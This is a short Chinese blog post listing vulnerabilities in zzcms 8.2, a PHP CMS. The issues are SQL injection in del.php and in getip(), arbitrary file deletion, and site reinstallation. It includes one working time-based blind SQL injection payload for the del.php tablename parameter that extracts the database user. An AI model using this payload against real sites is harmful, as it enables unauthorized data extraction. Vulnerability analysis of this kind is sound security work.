zzcms8.2的漏洞分析

  • by

正文:

参考:http://www.sec-redclub.com/archives/760/
1.del.php的sql注入漏洞
https://blog.csdn.net/CSDNPM250/article/details/81414162
不能使用大于号、小于号,因为post上来的数据被addslashes()、htmlspecialchars()、trim()三个函数消毒处理过了。

id=1&tablename=zzcms_answer where id=999999999 union select 1,2 and if((ascii(substr(user(),1,1)) = 114),sleep(3),1)#

2.getip()

未做任何过滤的sql注入漏洞

3.任意文件删除漏洞

4.网站重装漏洞

 
 
2018.8.22

发表评论

电子邮件地址不会被公开。 必填项已用*标注